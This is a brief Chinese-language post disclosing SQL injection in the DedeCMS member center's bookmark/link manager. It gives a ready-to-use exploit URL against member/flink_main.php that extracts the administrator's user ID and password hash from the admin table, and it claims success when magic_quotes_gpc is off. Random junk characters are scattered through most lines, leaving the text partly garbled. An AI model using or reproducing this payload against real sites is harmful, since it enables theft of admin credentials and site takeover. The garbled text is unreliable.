DedeCMS会员中心SQL注射漏洞/ T0 L0 o' g8 C7 I& X
需要magic_quotes_gpc = Off0 Q0 z9 G4 B$ c2 O! W/ f! Z1 E
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.' t4 R) K) e* _0 C. j0 x. d$ w
5 C% B9 G4 H8 M8 h
DedeCMS会员中心书签管理SQL注射漏洞
' j1 w% B: r% q" ~9 q5 v成功利用该漏洞可获得管理员密码
1 ]. ]! [+ B+ W @( n# ^4 S1 q
% B" b; {& Y m0 \* f3 b! y会员登录后可以执行SQL语句查询数据库任意内容如管理员密码& k" F6 m C" H: v) c8 m Q e
- i b1 x4 @9 khttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r2 E9 r8 x( s: W( w) q Q0 x. r
|